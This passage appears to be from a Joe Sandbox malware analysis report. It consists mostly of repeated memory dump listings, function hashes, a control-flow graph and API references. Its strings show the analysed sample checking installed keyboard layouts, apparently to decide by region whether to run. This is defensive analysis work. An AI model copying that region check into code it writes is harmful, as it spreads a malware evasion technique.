                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range$t#$t#$t#
                                                                                                                                                                • API String ID: 3677997916-3985744040
                                                                                                                                                                • Opcode ID: c04647712951832867d203b49bc5d890dda97159c20273a62091675175a1ed80
                                                                                                                                                                • Instruction ID: 1137a0e75807374acb6c5b829c4a9fc0bb5464caa735c5ff5f0c4a0ba7682bb4
                                                                                                                                                                • Opcode Fuzzy Hash: c04647712951832867d203b49bc5d890dda97159c20273a62091675175a1ed80
                                                                                                                                                                • Instruction Fuzzy Hash: C3C20571A002189FDF28DFA8CC85BEDB7B5EF45304F148299E509A72D2DB759A84CF90

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 737 a735a-a7366 738 a7368-a7376 737->738 739 a737c-a739e call bd663 737->739 738->739 740 a741c-a74db call d6c6a call b7a00 * 6 call a72b0 738->740 745 a73c8-a73e0 739->745 746 a73a0-a73ac 739->746 771 a7509-a750f 740->771 772 a74dd-a74e9 740->772 750 a740a-a741b 745->750 751 a73e2-a73ee 745->751 748 a73be-a73c5 call bd663 746->748 749 a73ae-a73bc 746->749 748->745 749->740 749->748 754 a7400-a7407 call bd663 751->754 755 a73f0-a73fe 751->755 754->750 755->740 755->754 775 a7539-a753f 771->775 776 a7511-a751d 771->776 773 a74eb-a74f9 772->773 774 a74ff-a7506 call bd663 772->774 773->774 779 a7587-a75e1 call d6c6a 773->779 774->771 777 a7569-a7584 call bcff1 775->777 778 a7541-a754d 775->778 781 a752f-a7536 call bd663 776->781 782 a751f-a752d 776->782 783 a755f-a7566 call bd663 778->783 784 a754f-a755d 778->784 795 a75e3-a75f7 call bd111 779->795 796 a7661-a76d7 call b80c0 * 3 779->796 781->775 782->779 782->781 783->777 784->779 784->783 795->796 801 a75f9-a765e call bd64e call bd0c7 795->801 812 a76d9-a76e5 796->812 813 a7705-a771d 796->813 801->796 814 a76fb-a7702 call bd663 812->814 815 a76e7-a76f5 812->815 816 a771f-a772b 813->816 817 a7747-a775f 813->817 814->813 815->814 818 a779b-a7810 call d6c6a call b8680 call b8320 815->818 820 a773d-a7744 call bd663 816->820 821 a772d-a773b 816->821 822 a7789-a779a 817->822 823 a7761-a776d 817->823 838 a783e-a78bd call b7a00 * 2 call a5c10 call b80c0 call a72b0 818->838 839 a7812-a781e 818->839 820->817 821->818 821->820 827 a777f-a7786 call bd663 823->827 828 a776f-a777d 823->828 827->822 828->818 828->827 864 a78eb-a78f1 838->864 865 a78bf-a78cb 838->865 841 a7820-a782e 839->841 842 a7834-a783b call bd663 839->842 841->842 844 a797a call d6c6a 841->844 842->838 849 a797f-a7a4a call d6c6a call b7a00 call a5c10 call b8320 call b7a00 call a5c10 call b80c0 call a72b0 844->849 894 a7a4c-a7a58 849->894 895 a7a74-a7a85 849->895 866 a791b-a7933 864->866 867 a78f3-a78ff 864->867 869 a78cd-a78db 865->869 870 a78e1-a78e8 call bd663 865->870 873 a795d-a7979 call bcff1 866->873 874 a7935-a7941 866->874 871 a7911-a7918 call bd663 867->871 872 a7901-a790f 867->872 869->849 869->870 870->864 871->866 872->849 872->871 878 a7953-a795a call bd663 874->878 879 a7943-a7951 874->879 878->873 879->849 879->878 896 a7a6a-a7a71 call bd663 894->896 897 a7a5a-a7a68 894->897 903 a7aaf-a7ac8 call bcff1 895->903 904 a7a87-a7a93 895->904 896->895 897->896 898 a7ac9 call d6c6a 897->898 906 a7ace-a7b1f call d6c6a call a6d70 898->906 907 a7aa5-a7aac call bd663 904->907 908 a7a95-a7aa3 904->908 916 a7b23-a7b30 906->916 917 a7b21 906->917 907->903 908->906 908->907 919 a7b5e-a7c18 call b7a00 call a5c10 call b7a00 call a5c10 call b8320 call b8220 call b7a00 call a5c10 call b80c0 call a72b0 916->919 920 a7b32-a7b3e 916->920 917->916 967 a7c1a-a7c26 919->967 968 a7c46-a7c5e 919->968 922 a7b40-a7b4e 920->922 923 a7b54-a7b5b call bd663 920->923 922->923 926 a7d18 call d6c6a 922->926 923->919 930 a7d1d call d6c6a 926->930 934 a7d22-a7db2 call d6c6a call d40f0 930->934 950 a7db8-a7f07 call b7a00 call a5c10 call b7a00 call a5c10 934->950 951 a8356-a8373 call bcff1 934->951 1004 a7f0d-a7f2c 950->1004 1005 a82f7-a82fa 950->1005 970 a7c28-a7c36 967->970 971 a7c3c-a7c43 call bd663 967->971 972 a7c8c-a7ca4 968->972 973 a7c60-a7c6c 968->973 970->930 970->971 971->968 974 a7cce-a7cd4 972->974 975 a7ca6-a7cb2 972->975 978 a7c6e-a7c7c 973->978 979 a7c82-a7c89 call bd663 973->979 984 a7cfe-a7d17 call bcff1 974->984 985 a7cd6-a7ce2 974->985 981 a7cc4-a7ccb call bd663 975->981 982 a7cb4-a7cc2 975->982 978->930 978->979 979->972 981->974 982->930 982->981 989 a7cf4-a7cfb call bd663 985->989 990 a7ce4-a7cf2 985->990 989->984 990->934 990->989 1011 a7f32-a7f39 1004->1011 1012 a82d4-a82d6 1004->1012 1006 a82fc-a8305 1005->1006 1007 a8351 1005->1007 1009 a832c-a832f 1006->1009 1010 a8307-a830b 1006->1010 1007->951 1017 a833d-a8349 1009->1017 1018 a8331-a833b 1009->1018 1013 a830d-a8312 1010->1013 1014 a8320-a832a 1010->1014 1015 a8019-a82bd call b7a00 call a5c10 call b7a00 call a5c10 call a5d50 call b7a00 call a5c10 call a5730 call b7a00 call a5c10 call b7a00 call a5c10 call a5d50 call b7a00 call a5c10 call a5730 call b7a00 call a5c10 call b7a00 call a5c10 call a5d50 call b7a00 call a5c10 call a5730 call b7a00 call a5c10 call b7a00 call a5c10 call a5d50 call b7a00 call a5c10 call a5730 1011->1015 1016 a7f3f-a7f81 call b7a00 call a5c10 call b7a00 call a5c10 1011->1016 1019 a82d8-a82e2 1012->1019 1020 a82e4-a82e7 1012->1020 1013->1014 1021 a8314-a831e 1013->1021 1014->1007 1056 a82c3-a82cc 1015->1056 1039 a7f86-a7f9b call a5d50 1016->1039 1023 a834c 1017->1023 1018->1007 1019->1023 1020->1007 1025 a82e9-a82f5 1020->1025 1021->1007 1023->1007 1025->1023 1043 a7fa0-a7fcb call d8bbe 1039->1043 1050 a7fcd-a7fdc 1043->1050 1051 a8002-a8004 1043->1051 1053 a7fde-a7fec 1050->1053 1054 a7ff2-a7fff call bd663 1050->1054 1055 a800a-a8014 1051->1055 1051->1056 1053->1054 1058 a8379-a837f call d6c6a 1053->1058 1054->1051 1055->1056 1056->1005 1061 a82ce 1056->1061 1061->1012
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConditionVariableWake
                                                                                                                                                                • String ID: t#$t#
                                                                                                                                                                • API String ID: 1192502693-1898090486
                                                                                                                                                                • Opcode ID: 8b990ae85aeb9c4de589fd34bc6dadbcaa88d126e861aff86069a40c3e31a6fa
                                                                                                                                                                • Instruction ID: 0e0e4c891a0a3dcc30cd0bfd723e18117f6ea4cbb95deaf8d67941f885c308f5
                                                                                                                                                                • Opcode Fuzzy Hash: 8b990ae85aeb9c4de589fd34bc6dadbcaa88d126e861aff86069a40c3e31a6fa
                                                                                                                                                                • Instruction Fuzzy Hash: C5725A71A14244ABDB18EFA8CC89BDDBB75EB46310F50825DF409A73C2DB759A80CB91
                                                                                                                                                                APIs
                                                                                                                                                                • ExitProcess.KERNEL32(?,?,000D652A,?,?,?,?,?,000D7661), ref: 000D6567
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                • Opcode ID: b5ec106eb8e3e9a4ac511f692edab8667d6ccecf707a93594268fc2427c3c7e7
                                                                                                                                                                • Instruction ID: c6861d8db90b4fab8638965c3b76c905d25fe3992eb39a6ab3c75c845376817e
                                                                                                                                                                • Opcode Fuzzy Hash: b5ec106eb8e3e9a4ac511f692edab8667d6ccecf707a93594268fc2427c3c7e7
                                                                                                                                                                • Instruction Fuzzy Hash: BCE08C31040A08AECE257F58D809AAE3B6AEB12785F514801F80946326CB26EE82C6A0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0ba20e8b0811cc4de855a338fb98fad3e5e925bb15c2b60b58be0823637352b0
                                                                                                                                                                • Instruction ID: ee26a0e8d8e25c35ef73028e973983fbf7917b667b501ecb8d5a9062a6475523
                                                                                                                                                                • Opcode Fuzzy Hash: 0ba20e8b0811cc4de855a338fb98fad3e5e925bb15c2b60b58be0823637352b0
                                                                                                                                                                • Instruction Fuzzy Hash: 9A012AFB78D114BD6052A0862F149F6A65EE5D673033088A6F50FC5813F2942E4D7031
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
